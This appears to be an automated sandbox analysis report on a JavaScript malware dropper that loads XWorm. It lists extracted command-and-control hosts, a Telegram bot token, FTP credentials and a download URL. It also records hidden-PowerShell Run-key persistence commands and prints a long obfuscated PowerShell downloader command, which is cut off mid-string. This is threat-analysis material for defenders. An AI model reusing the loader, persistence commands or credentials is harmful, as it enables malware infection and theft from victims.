Analysis
-
max time kernel
148s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 05:24
Static task
static1
Behavioral task
behavioral1
Sample
67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js
Resource
win10v2004-20241007-en
General
-
Target
67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js
-
Size
199KB
-
MD5
9feff1a23db299a128f16bc6091df793
-
SHA1
2041542fb6ddc259c2888d587f75a06947d6c0dc
-
SHA256
67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9
-
SHA512
6de1016f37d3df9d6b428b19076ea34fe2e9db0bbe09aa9bbaa637237b8130b47fd119bb39274ec618b3e4238ccbf53a4e7a562e2c9c714b73c6392a6a1102c2
-
SSDEEP
3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+3WXt+NWXt+NWXt+NWXt+NWXt+NWXC:W
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Extracted
Protocol: ftp- Host:
ftp.desckvbrat.com.br - Port:
21 - Username:
desckvbrat1 - Password:
fYudY1578@@@@@@
Extracted
xworm
5.0
moneyluckwork.ddns.net:7000
moneyluck.duckdns.org:7000
HLfH6HTja99GuzBA
-
install_file
USB.exe
-
telegram
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887
Extracted
gurcu
https://api.telegram.org/bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/2972-140-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Gurcu family
-
Xworm family
-
Blocklisted process makes network request 10 IoCs
flow pid Process 14 324 powershell.exe 19 324 powershell.exe 21 324 powershell.exe 23 1456 powershell.exe 24 1456 powershell.exe 25 1456 powershell.exe 29 1456 powershell.exe 31 1456 powershell.exe 36 1456 powershell.exe 37 3068 powershell.exe -
pid Process 1740 powershell.exe 324 powershell.exe 1648 powershell.exe 624 powershell.exe 4892 powershell.exe 3736 powershell.exe 2924 powershell.exe 2240 powershell.exe 2348 powershell.exe 4052 powershell.exe 1456 powershell.exe 3068 powershell.exe 5040 powershell.exe 3976 powershell.exe 772 powershell.exe 4312 powershell.exe 3160 powershell.exe 2184 powershell.exe 4768 powershell.exe 4004 powershell.exe 812 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_ykv = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_hvy = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\Program Rules NVIDEO\\sxodr.ps1' \";exit" powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 2 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 2484 cmd.exe 4604 cmd.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 28 pastebin.com 29 pastebin.com 37 pastebin.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3068 set thread context of 2972 3068 powershell.exe 116 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2972 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 49 IoCs
pid Process 1740 powershell.exe 1740 powershell.exe 324 powershell.exe 324 powershell.exe 324 powershell.exe 1456 powershell.exe 1456 powershell.exe 4312 powershell.exe 3160 powershell.exe 3160 powershell.exe 4312 powershell.exe 1456 powershell.exe 2184 powershell.exe 4768 powershell.exe 2184 powershell.exe 4768 powershell.exe 4004 powershell.exe 4004 powershell.exe 812 powershell.exe 812 powershell.exe 3068 powershell.exe 3068 powershell.exe 5040 powershell.exe 5040 powershell.exe 3068 powershell.exe 3068 powershell.exe 3068 powershell.exe 3068 powershell.exe 1648 powershell.exe 1648 powershell.exe 2972 RegAsm.exe 3976 powershell.exe 3976 powershell.exe 772 powershell.exe 772 powershell.exe 2240 powershell.exe 2240 powershell.exe 624 powershell.exe 624 powershell.exe 2348 powershell.exe 2348 powershell.exe 4892 powershell.exe 4892 powershell.exe 3736 powershell.exe 3736 powershell.exe 2924 powershell.exe 2924 powershell.exe 4052 powershell.exe 4052 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
description pid Process Token: SeDebugPrivilege 1740 powershell.exe Token: SeDebugPrivilege 324 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeDebugPrivilege 4312 powershell.exe Token: SeDebugPrivilege 3160 powershell.exe Token: SeDebugPrivilege 2184 powershell.exe Token: SeDebugPrivilege 4768 powershell.exe Token: SeDebugPrivilege 4004 powershell.exe Token: SeDebugPrivilege 812 powershell.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeDebugPrivilege 1648 powershell.exe Token: SeDebugPrivilege 2972 RegAsm.exe Token: SeDebugPrivilege 3976 powershell.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeDebugPrivilege 2240 powershell.exe Token: SeDebugPrivilege 624 powershell.exe Token: SeDebugPrivilege 2348 powershell.exe Token: SeDebugPrivilege 4892 powershell.exe Token: SeDebugPrivilege 3736 powershell.exe Token: SeDebugPrivilege 2924 powershell.exe Token: SeDebugPrivilege 4052 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2972 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2140 wrote to memory of 1740 2140 wscript.exe 83 PID 2140 wrote to memory of 1740 2140 wscript.exe 83 PID 1740 wrote to memory of 324 1740 powershell.exe 85 PID 1740 wrote to memory of 324 1740 powershell.exe 85 PID 324 wrote to memory of 1456 324 powershell.exe 93 PID 324 wrote to memory of 1456 324 powershell.exe 93 PID 1456 wrote to memory of 4312 1456 powershell.exe 94 PID 1456 wrote to memory of 4312 1456 powershell.exe 94 PID 1456 wrote to memory of 3160 1456 powershell.exe 95 PID 1456 wrote to memory of 3160 1456 powershell.exe 95 PID 1456 wrote to memory of 4076 1456 powershell.exe 96 PID 1456 wrote to memory of 4076 1456 powershell.exe 96 PID 1456 wrote to memory of 2484 1456 powershell.exe 99 PID 1456 wrote to memory of 2484 1456 powershell.exe 99 PID 2484 wrote to memory of 2184 2484 cmd.exe 100 PID 2484 wrote to memory of 2184 2484 cmd.exe 100 PID 1456 wrote to memory of 4604 1456 powershell.exe 101 PID 1456 wrote to memory of 4604 1456 powershell.exe 101 PID 4604 wrote to memory of 4768 4604 cmd.exe 102 PID 4604 wrote to memory of 4768 4604 cmd.exe 102 PID 2184 wrote to memory of 4004 2184 powershell.exe 104 PID 2184 wrote to memory of 4004 2184 powershell.exe 104 PID 4768 wrote to memory of 812 4768 powershell.exe 105 PID 4768 wrote to memory of 812 4768 powershell.exe 105 PID 1456 wrote to memory of 3068 1456 powershell.exe 110 PID 1456 wrote to memory of 3068 1456 powershell.exe 110 PID 1456 wrote to memory of 116 1456 powershell.exe 111 PID 1456 wrote to memory of 116 1456 powershell.exe 111 PID 3068 wrote to memory of 5040 3068 powershell.exe 112 PID 3068 wrote to memory of 5040 3068 powershell.exe 112 PID 3068 wrote to memory of 4448 3068 powershell.exe 114 PID 3068 wrote to memory of 4448 3068 powershell.exe 114 PID 3068 wrote to memory of 4448 3068 powershell.exe 114 PID 3068 wrote to memory of 2128 3068 powershell.exe 115 PID 3068 wrote to memory of 2128 3068 powershell.exe 115 PID 3068 wrote to memory of 2128 3068 powershell.exe 115 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 3068 wrote to memory of 2972 3068 powershell.exe 116 PID 5040 wrote to memory of 1648 5040 powershell.exe 117 PID 5040 wrote to memory of 1648 5040 powershell.exe 117 PID 1648 wrote to memory of 3976 1648 powershell.exe 119 PID 1648 wrote to memory of 3976 1648 powershell.exe 119 PID 1648 wrote to memory of 772 1648 powershell.exe 123 PID 1648 wrote to memory of 772 1648 powershell.exe 123 PID 1648 wrote to memory of 2240 1648 powershell.exe 124 PID 1648 wrote to memory of 2240 1648 powershell.exe 124 PID 1648 wrote to memory of 624 1648 powershell.exe 126 PID 1648 wrote to memory of 624 1648 powershell.exe 126 PID 1648 wrote to memory of 2348 1648 powershell.exe 127 PID 1648 wrote to memory of 2348 1648 powershell.exe 127 PID 1648 wrote to memory of 4892 1648 powershell.exe 128 PID 1648 wrote to memory of 4892 1648 powershell.exe 128 PID 1648 wrote to memory of 3736 1648 powershell.exe 129 PID 1648 wrote to memory of 3736 1648 powershell.exe 129 PID 1648 wrote to memory of 2924 1648 powershell.exe 130 PID 1648 wrote to memory of 2924 1648 powershell.exe 130 PID 1648 wrote to memory of 4052 1648 powershell.exe 131 PID 1648 wrote to memory of 4052 1648 powershell.exe 131
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAHQAcA' + [char]66 + 'XAGsARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAdA' + [char]66 + 'wAFcAaw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAag' + [char]66 + 'sAGMAcQ' + [char]66 + 'qACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAE8Aag' + [char]66 + 'yAFIAUAAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAE8Aag' + [char]66 + 'yAFIAUAAsACAAJA' + 